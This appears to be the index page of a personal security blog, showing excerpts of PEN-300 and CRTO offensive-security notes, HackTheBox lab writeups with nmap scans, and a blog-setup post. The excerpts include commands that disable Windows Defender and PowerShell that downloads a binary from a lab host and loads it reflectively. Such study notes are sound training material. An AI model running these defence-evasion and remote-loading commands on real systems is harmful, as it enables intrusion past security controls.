Home
00x71 Blog
Cancel

Offensive-Security PEN-300 Notes

Disable Anti-Virus Disable Windows Defender REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring " /t REG_DWORD /d 1 /f or Set-MpPreference -DisableRealtimeM...

CRTO Notes

[system.reflection.assembly]::LoadFile("file") [namespace.class]::Main() Binary reflective loading $data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/binary.exe') $assem...

Enable Google Page Views

This post is to enable Page Views on the Chirpy theme based blog that you just built. This requires technical knowledge and it’s recommended to keep the google_analytics.pv.* empty unless you have ...

OpenAdmin Writeup – HackTheBox

Scanning nmap -sV -A -sC -T4 -v -oN Scan.nmap 10.10.10.171 Nmap scan report for 10.10.10.17 Host is up (0.13s latency). Not shown: 995 filtered ports PORT STATE SERVICE VERSION 22/tcp open ...

Traverxec Writeup – HackTheBox

Scanning nmap -sV -A -sC -T4 -v 10.10.10.165 Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-07 17:57 EST Nmap scan report for 10.10.10.165 Host is up (0.12s latency). Not shown: 998 filtered...